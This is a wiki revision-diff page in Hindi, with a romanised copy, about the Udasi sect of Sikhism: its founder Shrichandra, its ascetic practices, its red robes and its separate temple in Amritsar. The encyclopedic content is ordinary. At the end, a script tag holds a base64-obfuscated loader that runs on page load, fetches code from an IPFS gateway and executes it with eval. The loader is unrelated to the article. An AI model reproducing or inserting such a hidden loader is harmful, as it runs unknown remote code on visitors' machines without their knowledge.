Difference between revisions of "उदासी सम्प्रदाय"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
'''उदासी सम्प्रदाय''' [[सिक्ख धर्म]] के सम्प्रदायों में से एक है। इस सम्प्रदाय के प्रवर्तक [[गुरु नानक]] के पुत्र श्रीचन्द्र थे।
+
'''उदासी सम्प्रदाय''' [[सिक्ख धर्म]] के सम्प्रदायों में से एक है। इस सम्प्रदाय के प्रवर्तक [[गुरु नानक]] के पुत्र 'श्रीचन्द्र' थे। [[सिक्ख|सिक्खों]] के मुख्य रूप से दो सम्प्रदाय हैं- 'सहिजधारी' और 'सिंह'। सहिजधारियों एवं सिंहों के भी कई उप-सम्प्रदाय हैं। उदासी (संन्यासमार्गी) सहिजधारी शाखा के हैं।
  
*[[सिक्ख|सिक्खों]] के मुख्य रूप से दो सम्प्रदाय हैं- सहिजधारी और सिंह।
 
*सहिजधारियों एवं सिंहों के भी कई कई उपसम्प्रदाय हैं।
 
*उदासी (संन्यासमार्गी) सहिजधारी शाखा के हैं।
 
 
*उदासी सम्प्रदाय का प्रारम्भ लगभग 1439 ई. में हुआ था। इसके प्रवर्तक [[नानक]] के पुत्र श्रीचन्द्र थे।
 
*उदासी सम्प्रदाय का प्रारम्भ लगभग 1439 ई. में हुआ था। इसके प्रवर्तक [[नानक]] के पुत्र श्रीचन्द्र थे।
*श्रीचन्द्र ने नानक के मत को कुछ व्यापक रूप देकर यह नया मत चलाया था, जो सनातनी [[हिन्दू|हिन्दुओं]] के निकट है।
+
*श्रीचन्द्र ने गुरु नानक देव के मत को कुछ व्यापक रूप देकर यह नया मत चलाया था, जो सनातनी [[हिन्दू|हिन्दुओं]] के निकट है।
 +
*उदासी, जो कि [[संस्कृत]] के 'उदास' शब्द से आया है, इसका अर्थ है- 'परित्याग करना' या 'वैराग्य लेना'। इस पंथ में सदस्यों के ब्रह्मचर्य और संन्यास को ज़रूरी माना जाता है।
 +
*छठे [[सिक्ख]] [[गुरु हरगोबिन्द सिंह]] के बड़े पुत्र बाबा गुरुदित्ता के नेतृत्व में इस संप्रदाय ने सिक्खों के गृहक्षेत्र [[पंजाब]] के उत्तर और पूर्व में धर्म प्रचारक का कार्य किया। उन्होंने 'खालसा' के प्रतीक पांच ककार- 'केश', 'कंघा', 'कृपाण', 'कच्छा' और 'कड़ा'- को नहीं अपनाया।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=भारत ज्ञानकोश, खण्ड-1|लेखक=इंदु रामचंदानी|अनुवादक= |आलोचक= |प्रकाशक=एंसाइक्लोपीडिया ब्रिटैनिका प्राइवेट लिमिटेड, नई दिल्ली और पॉप्युलर प्रकाशन, मुम्बई|संकलन= भारतकोश पुस्तकालय|संपादन= |पृष्ठ संख्या=232|url=}}</ref>
 +
*उदासी पंथ के लोग बाल कटवाते हैं और उन्हें दाढ़ी बनाने की इजाज़त होती है।
 +
*इस पंथ के लोग [[लाल रंग]] के कपड़े पहनते हैं तथा जाति सूचक नामों, जनेऊ और आमतौर पर [[हिन्दू]] संन्यासियों से जुड़ी प्रार्थना पुस्तकों का उपयोग करते हैं।
 +
*उदासी पंथ के अनुयायियों का [[अमृतसर]], [[पंजाब]] में प्रमुख सिक्ख मंदिर, [[स्वर्ण मंदिर]] (हरमंदिर) के बग़ल में अपना अलग मंदिर है।
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
Line 11: Line 13:
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
{{सिक्ख धर्म}}
+
{{सिक्ख धर्म}}{{धर्म}}
 
[[Category:सिक्ख धर्म]][[Category:सिक्ख धर्म कोश]][[Category:धर्म कोश]]
 
[[Category:सिक्ख धर्म]][[Category:सिक्ख धर्म कोश]][[Category:धर्म कोश]]
 
__INDEX__
 
__INDEX__

Revision as of 12:57, 22 July 2014

udasi sampraday sikkh dharm ke sampradayoan mean se ek hai. is sampraday ke pravartak guru nanak ke putr 'shrichandr' the. sikkhoan ke mukhy roop se do sampraday haian- 'sahijadhari' aur 'sianh'. sahijadhariyoan evan sianhoan ke bhi kee up-sampraday haian. udasi (sannyasamargi) sahijadhari shakha ke haian.

  • udasi sampraday ka prarambh lagabhag 1439 ee. mean hua tha. isake pravartak nanak ke putr shrichandr the.
  • shrichandr ne guru nanak dev ke mat ko kuchh vyapak roop dekar yah naya mat chalaya tha, jo sanatani hinduoan ke nikat hai.
  • udasi, jo ki sanskrit ke 'udas' shabd se aya hai, isaka arth hai- 'parityag karana' ya 'vairagy lena'. is panth mean sadasyoan ke brahmachary aur sannyas ko zaroori mana jata hai.
  • chhathe sikkh guru haragobind sianh ke b de putr baba guruditta ke netritv mean is sanpraday ne sikkhoan ke grihakshetr panjab ke uttar aur poorv mean dharm pracharak ka kary kiya. unhoanne 'khalasa' ke pratik paanch kakar- 'kesh', 'kangha', 'kripan', 'kachchha' aur 'k da'- ko nahian apanaya.[1]
  • udasi panth ke log bal katavate haian aur unhean dadhi banane ki ijazat hoti hai.
  • is panth ke log lal rang ke kap de pahanate haian tatha jati soochak namoan, janeoo aur amataur par hindoo sannyasiyoan se ju di prarthana pustakoan ka upayog karate haian.
  • udasi panth ke anuyayiyoan ka amritasar, panjab mean pramukh sikkh mandir, svarn mandir (haramandir) ke bagal mean apana alag mandir hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. bharat jnanakosh, khand-1 |lekhak: iandu ramachandani |prakashak: eansaiklopidiya britainika praivet limited, nee dilli aur p aaupyular prakashan, mumbee |sankalan: bharatakosh pustakalay |prishth sankhya: 232 |

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>